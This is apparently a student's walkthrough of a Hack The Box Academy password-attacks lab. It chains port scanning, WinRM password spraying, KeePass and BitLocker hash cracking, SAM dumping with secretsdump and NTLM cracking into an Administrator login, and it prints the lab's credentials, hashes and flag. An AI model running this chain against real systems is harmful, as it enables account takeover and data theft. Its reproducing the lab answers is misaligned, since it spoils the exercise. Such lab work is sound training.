The next host is a Windows-based client. As with the previous assessments, our client would like to make sure that an attacker cannot gain access to any sensitive files in the event of a successful attack. While our colleagues were busy with other hosts on the network, we found out that the user Johanna is present on many hosts. However, we have not yet been able to determine the exact purpose or reason for this.


Challenge: 10.129.202.222 


Question 1 - Examine the third target and submit the contents of flag.txt in C:\Users\Administrator\Desktop\ as the answer. 

1. wget https://academy.hackthebox.com/storage/resources/Password-Attacks.zip && unzip Password-Attacks.zip
2. hashcat password.list -r custom.rule --stdout | sort -u > mut_password.list
3. nmap -T5 -p- -Pn 10.129.202.222

Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-22 10:50 GMT
Warning: 10.129.202.222 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.129.202.222
Host is up (0.077s latency).
Not shown: 65454 closed tcp ports (conn-refused), 65 filtered tcp ports (no-response)
PORT      STATE SERVICE
111/tcp   open  rpcbind
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
2049/tcp  open  nfs
3389/tcp  open  ms-wbt-server
5985/tcp  open  wsman
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49679/tcp open  unknown
49680/tcp open  unknown
49681/tcp open  unknown

4. sudo crackmapexec winrm 10.129.202.222 -u Johanna -p mut_password.list
WINRM       10.129.202.222  5985   WINSRV           [+] WINSRV\Johanna:1231234! (Pwn3d!)

5. evil-winrm -i 10.129.202.222 -u johanna 
enter password 
6. dir 
7. downlaod Logins.kdbx 
8. BACK ON HOST MACHINE -> keepass2john Logins.kdbx > keepass.hash 
9. john keepass.hash --wordlist=mut_password.list 
Qwerty7!         (Logins) 
10. xfreerdp /v:10.129.202.222 /u:johanna /p:123123! 
11. go to file explorer
12. find Logins.kdbx 
13. click it and enter cracked password of -> Qwerty7! 
14. we see david and a ******** password -> right click and hit copy password. 
15. david:gRzX7YbeTcDG7
16. back on host open new terminal -> 
smbclient -U david '\\10.129.202.222\david'
Enter password 
17. dir 
18. get Backup.vhd
19. exit -> back to host terminal 
20. file Backup.vhd 
Backup.vhd: DOS/MBR boot sector MS-MBR Windows 7 english at offset 0x163 "Invalid partition table" at offset 0x17b "Error loading operating system" at offset 0x19a "Missing operating system"; partition 1 : ID=0xee, start-CHS (0x0,0,2), end-CHS (0xf,254,63), startsector 1, 4294967295 sectors

21. bitlocker2john -i Backup.vhd > bitlocker.hash

Signature found at 0x1000003
Version: 8 
Invalid version, looking for a signature with valid version...

Signature found at 0x3200000
Version: 2 (Windows 7 or later)

VMK entry found at 0x32000b1

VMK encrypted with User Password found at 32000d2
VMK encrypted with AES-CCM

VMK entry found at 0x3200191

VMK encrypted with Recovery Password found at 0x32001b2
Searching AES-CCM from 0x32001ce
Trying offset 0x3200261....
VMK encrypted with AES-CCM!!

Signature found at 0x3eab000
Version: 2 (Windows 7 or later)

VMK entry found at 0x3eab0b1

VMK entry found at 0x3eab191

Signature found at 0x4b56000
Version: 2 (Windows 7 or later)

VMK entry found at 0x4b560b1

VMK entry found at 0x4b56191

22. john bitlocker.hash --wordlist=mut_password.list

Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (BitLocker, BitLocker [SHA-256 AES 32/64])
Cost 1 (iteration count) is 1048576 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:08:45 1.24% (ETA: 06:06:57) 0g/s 2.495p/s 4.991c/s 4.991C/s 1234562002!..1234562004
123456789!       (?)
123456789!       (?)

23. okay i got stuck and had to look at solution cause... wtf... 
24. From the output of john, students will know that the hash's cleartext password is 123456789!. Then, students need to mount Backup.vhd using dislocker. Students first need to install dislocker, is not installed already: 
sudo apt install dislocker 

25. see this is where i struggle.... 
Subsequently, students need to mount the drive as a loopback device and use dislocker in order to access the files:
sudo mkdir -p /media/bitlocker
sudo mkdir -p /media/bitlockermount
sudo losetup -f -P Backup.vhd
sudo dislocker /dev/loop0p2 -u123456789! -- /media/bitlocker
sudo mount -o loop /media/bitlocker/dislocker-file /media/bitlockermount

-> like where the fuck did all this come from.. im sure i missed some readings but i dont remember seeing any of this or dislocker./. aksdfljghbasdrilkufgh iqaw
ANYWAY 
26. cd /media/bitlockermount
27. ls -la 
total 19104
drwxrwxrwx 1 root root     4096 Feb 11  2022  .
drwxr-xr-x 5 root root     4096 Mar 16 14:34  ..
drwxrwxrwx 1 root root        0 Feb 11  2022 '$RECYCLE.BIN'
-rwxrwxrwx 1 root root    77824 Feb 11  2022  SAM
-rwxrwxrwx 1 root root 19472384 Feb 11  2022  SYSTEM
drwxrwxrwx 1 root root     4096 Feb 11  2022 'System Volume Information'
29. secretsdump.py LOCAL -sam SAM -system SYSTEM 
Impacket v0.13.0.dev0+20250130.104306.0f4b866 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0x62649a98dea282e3c3df04cc5fe4c130
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e53d4d912d96874e83429886c7bf22a1:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:9e73cc8353847cfce7b5f88061103b43:::
sshd:1000:aad3b435b51404eeaad3b435b51404ee:6ba6aae01bae3868d8bf31421d586153:::
david:1009:aad3b435b51404eeaad3b435b51404ee:b20d19ca5d5504a0c9ff7666fbe3ada5:::
johanna:1010:aad3b435b51404eeaad3b435b51404ee:0b8df7c13384227c017efc6db3913374:::
[*] Cleaning up... 

30. lets hashcat crack admins pass 
31. hashcat -m 1000 e53d4d912d96874e83429886c7bf22a1 mut_password.list
e53d4d912d96874e83429886c7bf22a1:Liverp00l8!
32. xfreerdp /v:10.129.202.222 /u:Administrator /p:'Liverp00l8!' /dynamic-resolution 
33. flag.txt is on the desktop -> HTB{PWcr4ck1ngokokok}
